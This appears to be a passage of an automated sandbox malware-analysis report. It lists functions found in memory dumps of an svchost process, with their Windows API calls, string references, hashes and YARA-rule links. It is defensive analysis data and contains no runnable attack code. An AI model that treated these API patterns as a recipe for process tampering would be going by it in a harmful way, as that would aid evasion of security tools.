Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 4561CC3A929A4096F7E49FA5E56831BB7B1F388744F100535EB8D43BAADBBCC540CB00

Function 0000022F4B923EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F68

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: b3c1c112d2e11a003287798bdc41f0482b20c7cd380c6116318526b11c9f8f77
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 60113A2AE08740A7FBA4AF61E55825A77B0FB49B80F140436DB4D037A9EBADC944C781

Function 0000022F4B928CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022F4B928CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000022F4B928D62
RtlUnwindEx.NTDLL ref: 0000022F4B928DBC

Strings

csm, xrefs: 0000022F4B928D49

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 7cb284ad2bbe1a30e649e4dd8f8e8b9c1cc85bb7e2b6f127796852b835166346
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: D851D33AF01600AAEB98EF55E1A876E37A1EB54B88F048930DF494778AD7BCC845C700

Function 0000022F4B92A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000022F4B92A75B
_CallSETranslator.LIBVCRUNTIME ref: 0000022F4B92A7A7

Strings

RCC, xrefs: 0000022F4B92A777
MOC, xrefs: 0000022F4B92A76F

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 2519287d322944cfd7feb94d4905a80ad8ecedd1afd163043e9b4c01a4f3e364
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 5A61C13BD04BC491EBA8AF55E55539AB7B0F794B94F044A35EB8813B96CBBCC091CB00

Function 0000022F4B92AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022F4B92AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000022F4B92ABBC

Strings

csm, xrefs: 0000022F4B92AAF6
csm, xrefs: 0000022F4B92AC0E

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: c13a4aa0f0c44daca869980378c499b26511675fa44cc9a95517fb1184cc627c
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 5C518E3BD00740ABFBA8AFA1D66835A77B0E354B94F1449359B8947B96C7BCC452CB01

Function 0000022F4B8F9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022F4B8F9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000022F4B8F9FBC

Strings

csm, xrefs: 0000022F4B8FA00E
csm, xrefs: 0000022F4B8F9EF6

Memory Dump Source

Source File: 0000000C.00000003.1538492265.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_3_22f4b8f0000_svchost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 622ab557142c9faff67b5bb53c6bde86df1ea76d362581bbbeddfaa336dc5a18
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 9651A63AA00340D6EBB4AF91E248B5A77B0F394B9AF144135DB4947BD6EBB8C453CB01

Function 0000022F4B923950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 0000022F4B923972
StrStrW.SHLWAPI ref: 0000022F4B923990
StrToIntW.SHLWAPI ref: 0000022F4B9239B7

Part of subcall function 0000022F4B921A30: OpenProcess.KERNEL32 ref: 0000022F4B921A56
Part of subcall function 0000022F4B921A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000022F4B921A74
Part of subcall function 0000022F4B921A30: PathFindFileNameW.SHLWAPI ref: 0000022F4B921A83
Part of subcall function 0000022F4B921A30: lstrlenW.KERNEL32 ref: 0000022F4B921A8F
Part of subcall function 0000022F4B921A30: StrCpyW.SHLWAPI ref: 0000022F4B921AA2
Part of subcall function 0000022F4B921A30: CloseHandle.KERNEL32 ref: 0000022F4B921AB0

Part of subcall function 0000022F4B923F88: StrCmpNIW.KERNELBASE(?,?,?,0000022F4B92272F), ref: 0000022F4B923FA0

Strings

pid_, xrefs: 0000022F4B923968

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: ab322a2d4964e99f23f1116aef8ef54fab78dd75f398024ce987d62f44f25bf3
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: B411A519F14B81B2FB94AFA5EA2939B63B4F748740F8108319B4D83696EFACC915C700

Function 0000022F4B931FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000022F4B932027
WriteFile.KERNEL32 ref: 0000022F4B932304
WriteFile.KERNEL32 ref: 0000022F4B93234A
GetLastError.KERNEL32 ref: 0000022F4B932409

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 65ab33f9e86a3793016190f554dd470263d197bad517fea0e7f9cd5ea5b1132a
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 98D1FF36B14A80A9EB94DFA5D6683DE37B1F349B98F405236CF4D97B9ADA74C006C340

Function 0000022F4B9214A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000022F4B9214C6
HeapFree.KERNEL32 ref: 0000022F4B9214D5
GetProcessHeap.KERNEL32 ref: 0000022F4B9214E2
HeapFree.KERNEL32 ref: 0000022F4B9214F1
GetProcessHeap.KERNEL32 ref: 0000022F4B921501

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 56e8b8fcdf47366c570304169e9c02a7fee4cc887c1613258ea6998d8deb5e52
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 01015736A10B90EAE794EFE6E92814A77B1F78CF80B099035DF4943729DE78D461C740

Function 0000022F4B9328F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000022F4B9328DF), ref: 0000022F4B932A12

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: a05a13cbd6c50fc86814b52849a412da34fb816029a598fb177ae6ce372f8a44
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 1791F63AE10654A5FF98AFA5D6783AE3BB0F34DB88F546139DF0A53686CAB4C445C300

Function 0000022F4B928090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000022F4B9280BC
GetCurrentThreadId.KERNEL32 ref: 0000022F4B9280CA
GetCurrentProcessId.KERNEL32 ref: 0000022F4B9280D6
QueryPerformanceCounter.KERNEL32 ref: 0000022F4B9280E6

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 7315c7c0fdf0fd24ccb5326225aca3ef93bf920e04fc4ac136ff2fecd1a1c651
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 64115E2AB10F009AEB80DFA0E9683A933B4F71D758F441E31DB6D427A5DBB8C194C340

Function 0000022F4B9227E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000022F4B9228CC
StrCpyW.SHLWAPI ref: 0000022F4B9228E5

Part of subcall function 0000022F4B923F88: StrCmpNIW.KERNELBASE(?,?,?,0000022F4B92272F), ref: 0000022F4B923FA0

Strings

\\.\pipe\, xrefs: 0000022F4B9228D7

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 69b0edfe0cb17288d0b0df2ba938852f381a9f43c30d0951323d7d8a6a24af5e
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 0071832AE04B4165FFBCAEA6DA683AB77B4F345784F510836DF0947B96DAB8C500C740

Function 0000022F4B8F80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022F4B8F80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000022F4B8F8162

Strings

csm, xrefs: 0000022F4B8F8149

Memory Dump Source

Source File: 0000000C.00000003.1538492265.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_3_22f4b8f0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 9d5e0100f5ffe4596352da2ba97978141a35c5f3890224abb4ce1ccde644c2fd
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: A951D23AB11A05EADB94EF95D54CF6E33B1F344B89F1542319B464778AE7B8D882C700

Function 0000022F4B8F9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 0000022F4B8F9BA7

Strings

RCC, xrefs: 0000022F4B8F9B77
MOC, xrefs: 0000022F4B8F9B6F

Memory Dump Source

Source File: 0000000C.00000003.1538492265.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_3_22f4b8f0000_svchost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: eb72844637493c4f102b5757175871491ca948ddf3b39f32b9f3a56f7479e12c
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: FE61C236904BC491DBB0AF55E544B9AB7B0F795BC9F144235EB9807B96EBBCC091CB00

Function 0000022F4B9225DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000022F4B9226C2
StrCpyW.SHLWAPI ref: 0000022F4B9226D9

Strings

\\.\pipe\, xrefs: 0000022F4B9226CD

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: dff5c28ae23f6fb28725aba5b6bbbfb6d753e5a829e45e780184bca63f5c3eae
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 5451E62AE0878061FEACAEA5E66C3AB7775F394740F040835CF4943B6ADABDD400CB40

Function 0000022F4B932660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000022F4B932778
GetLastError.KERNEL32 ref: 0000022F4B93279D

Strings

U, xrefs: 0000022F4B932722

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 27cf9f434496b3bd170b431ba0fea5b332a09b693fd3e9a843dce89e3fca500e
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 61411636A25A80A6EB90EFA5E55879BB7B0F34C784F401032EF4D87759EBB8C441CB40

Function 0000022F4B929178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000022F4B9291C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,0000022F4B9287F7), ref: 0000022F4B929209

Strings

csm, xrefs: 0000022F4B9291F6

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 7368844f5f46a0da056b2b14b5b0993db77552c27402f613873d14bbf342e81d
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 08117936A04B8092EBA49F15F51824AB7E1F798B84F188634EF8D07B66DF7CC551CB00

Function 0000022F4B921D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000022F4B921D69
HeapAlloc.KERNEL32 ref: 0000022F4B921D77
GetProcessHeap.KERNEL32 ref: 0000022F4B921D9C
HeapFree.KERNEL32 ref: 0000022F4B921DAA

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: d2d243e1f4da33dff666983cb4b4fc9292e00df8db3f46f6f3574d3ee2618496
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 7B115A29A01B9091EA94EFA6E52815A67B0E78CFC0F589034DF4A57726DEB8D452C300

Function 0000022F4B921000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000022F4B921006
HeapAlloc.KERNEL32 ref: 0000022F4B921015
GetProcessHeap.KERNEL32 ref: 0000022F4B921028
HeapAlloc.KERNEL32 ref: 0000022F4B921037

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: e58150afabff5c1ea00ebf14978d6c6d839fdce1e2f42293329f13860d5d1706
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 4DE0ED75A11604AAE798AFA2D92825A76B1FB8CB15F44D034CA0907311EEB88899D710

Analysis Process: dwm.exePID: 976, Parent PID: 6140COMMON

